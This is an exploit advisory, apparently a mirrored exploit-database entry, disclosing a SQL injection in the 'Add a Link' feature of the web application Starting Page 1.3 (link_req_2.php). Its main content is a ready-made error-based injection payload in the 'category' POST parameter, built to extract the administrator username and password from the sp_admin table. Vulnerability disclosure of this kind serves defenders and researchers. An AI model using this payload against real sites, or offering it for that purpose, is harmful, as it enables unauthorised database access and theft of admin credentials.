Starting Page 1.3 – ‘category’ SQL Injection

  • 作者: Ben Lee
    日期: 2017-01-11
  • 类别:
  • 来源:
  • # Exploit Title: Starting Page 1.3 "Add a Link" - SQL Injection
    # Date: 11-01-2017
    # Software Link:<>
    # Exploit Author: Ben Lee
    # Contact:
    # Category: webapps
    # Tested on: Win7
    1. Description
    The vulnerable file is "link_req_2.php",all the post parameters do not get filtered,then do sql query。
    2. Vulnerable parameters:
    3.Proof of Concept:
    Post data:
    [category=1' AND (select 1 from(select count(*),concat((select(select(select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e)from sp_admin limit 0,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND 'a'='a&name=abc&]
    Best Regards!
    Ben Lee